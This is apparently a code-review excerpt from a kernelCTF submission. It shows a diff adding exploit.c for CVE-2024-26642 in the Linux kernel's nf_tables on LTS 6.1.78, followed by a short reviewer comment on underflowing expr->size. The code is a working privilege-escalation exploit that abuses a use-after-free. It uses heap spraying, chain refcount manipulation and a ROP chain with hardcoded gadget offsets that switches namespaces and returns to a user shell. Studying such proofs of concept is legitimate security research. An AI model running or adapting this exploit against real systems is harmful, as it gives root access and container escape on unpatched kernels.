pocs/linux/kernelctf/CVE-2024-26642_lts/exploit/lts-6.1.78/exploit.c

```diff
@@ -0,0 +1,512 @@
+    *(uint64_t *)&ops[0x68] = 0;
+    *(uint64_t *)&ops[0x70] = kernel_off + 0xFFFFFFFF81113167;//pop rbx ; ret ; because ops->0x78 is the last_type
+    *(uint64_t *)&ops[0x80] = kernel_off + 0xffffffff8102e2a6;//pop rsi ; ret
+    *(uint64_t *)&ops[0x88] = kernel_off + 0xFFFFFFFF838766A0;//init_nsproxy
+    *(uint64_t *)&ops[0x90] = kernel_off + 0xFFFFFFFF811BB4F0;//switch_task_namespaces
+    *(uint64_t *)&ops[0x98] = kernel_off + 0xffffffff8218de86;//swapgs; ret
+    *(uint64_t *)&ops[0xa0] = kernel_off + 0xFFFFFFFF822011D7;//iretq
+    *(uint64_t *)&ops[0xa8] = (uint64_t)shell;
+    *(uint64_t *)&ops[0xb0] = user_cs;
+    *(uint64_t *)&ops[0xb8] = user_rflags;
+    *(uint64_t *)&ops[0xc0] = user_rsp|8;
+    *(uint64_t *)&ops[0xc8] = user_ss;
+     //step 11
+    //free the last object.
+    for(i=0;i<0x100;i++){
+	if(i==0x80)
+		continue;
+        snprintf(obj_name,0x40,"obj_for_leak_%d",i);
+        del_obj(socket, table, obj_name, NFT_OBJECT_CT_EXPECT);
+    }
+    //heap spray to fill target heap
+    spray_tables(socket,0x800, ops, 0xe8);
+    printf("Finish prepare.\n");
+    target_heap = obj_a;
+}
+
+
+void jmp_rop(struct nl_sock * socket){
+    char *pipapo_set = "set pipapo for rop";
+    char *hash_set_for_expr = "set hashtable for expr";
+    char *table = "table for rop";
+    char *target_chain = "chain for rop";
+    int i;
+    printf("start rop\n");
+    new_table(socket, table);
+    cur_handle = 0;
+    new_chain(socket, table, target_chain, 0);
+    
+    new_set_pipapo_for_chain(socket, table, pipapo_set, 0x40);
+    new_set_hashtable_with_elemdata(socket, table, hash_set_for_expr, 0x30, 0x10);
+    nl_socket_modify_cb(socket,NL_CB_MSG_IN, NL_CB_CUSTOM, nl_callback_find_target_setelem, NULL);
+
+    //step 1
+    //create some elements to make chain->use = 0x20
+    
+    char *pad = malloc(0x100);
+    memset(pad,0x41,0x100);
+    char *key = malloc(0x40);
+    char *key_end = malloc(0x40);
+    char *hash_key_48 = malloc(48);
+    memset(hash_key_48, 0, 48);
+    
+    for(i=0;i<0x20;i++){
+    	memset(key,i,0x40);
+	memset(key_end,i,0x40);
+	new_setelem_with_chain(socket, table, pipapo_set, pad, 0x100, key, 0x40, key_end, 0x40, target_chain);
+    }
+    
+    //step 2 trigger vul to make chain->use = 0
+    
+    primitive_1(socket, table, target_chain, 0x20);
+    //step 3 delete target chain
+    
+    del_chain(socket, table, target_chain);
+    sleep(5);
+    //step 4 create normal set elem with expr, make offsetof(chain->use) == offsetof(expr->size)
+    *(uint64_t *)&pad[0] = target_heap;//expr->ops
+    *(uint64_t *)&pad[8] = kernel_off + 0xffffffff81fa7c53;//leave ; ret
+    for(i=0;i<0x1000;i++){
+    	*(uint64_t *)hash_key_48 = i;
+	new_setelem_with_expr_and_elemdata(socket, table, hash_set_for_expr, pad, 0x10, NULL, hash_key_48, 48, NULL, 0);
+    }
+    
+    
+    //step 5 flush set to change the expr->size;
```

Comment:
I know that you mentioned this in the linked documentation but it's worth mentioning here as well that this makes the expr->size very large by underflowing it.

Reply:
OK